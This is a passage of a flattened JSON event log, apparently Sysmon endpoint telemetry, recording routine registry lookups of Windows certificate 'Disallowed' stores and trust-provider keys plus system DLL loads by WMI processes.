131883573481830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573481830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "msscntrs.dll", - "image_path": "C:\\Windows\\System32\\msscntrs.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573479950016, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573481830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573481830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "combase.dll", - "image_path": "C:\\Windows\\System32\\combase.dll", - "pid": 7720, - "process_name": "WmiApSrv.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", - "timestamp": 131883573481830000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573481830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573481980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573481980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573481980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573481980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573481980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573481980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573481980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573481980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573481980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573481980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573481980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573481980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573481980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573481980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573481980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 7720, - "process_name": "WmiApSrv.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", - "timestamp": 131883573481980000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" - }, - { - "event_type": "image_load", - "image_name": "bcryptprimitives.dll", - "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", - "pid": 7720, - "process_name": "WmiApSrv.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", - "timestamp": 131883573481980000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" - }, - { - "event_type": "image_load", - "image_name": "perfdisk.dll", - "image_path": "C:\\Windows\\System32\\perfdisk.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573479950016, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573481980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573481980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "kernel.appcore.dll", - "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", - "pid": 7720, - "process_name": "WmiApSrv.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", - "timestamp": 131883573481980000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\System32\\user32.dll", - "pid": 7720, - "process_name": "WmiApSrv.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", - "timestamp": 131883573481980000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" - }, - { - "event_type": "image_load", - "image_name": "win32u.dll", - "image_path": "C:\\Windows\\System32\\win32u.dll", - "pid": 7720, - "process_name": "WmiApSrv.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", - "timestamp": 131883573481980000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573481980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "gdi32.dll", - "image_path": "C:\\Windows\\System32\\gdi32.dll", - "pid": 7720, - "process_name": "WmiApSrv.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", - "timestamp": 131883573481980000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" - }, - { - "event_type": "image_load", - "image_name": "gdi32full.dll", - "image_path": "C:\\Windows\\System32\\gdi32full.dll", - "pid": 7720, - "process_name": "WmiApSrv.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", - "timestamp": 131883573481980000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "perfnet.dll", - "image_path": "C:\\Windows\\System32\\perfnet.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573479950016, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "msvcp_win.dll", - "image_path": "C:\\Windows\\System32\\msvcp_win.dll", - "pid": 7720, - "process_name": "WmiApSrv.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573482140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 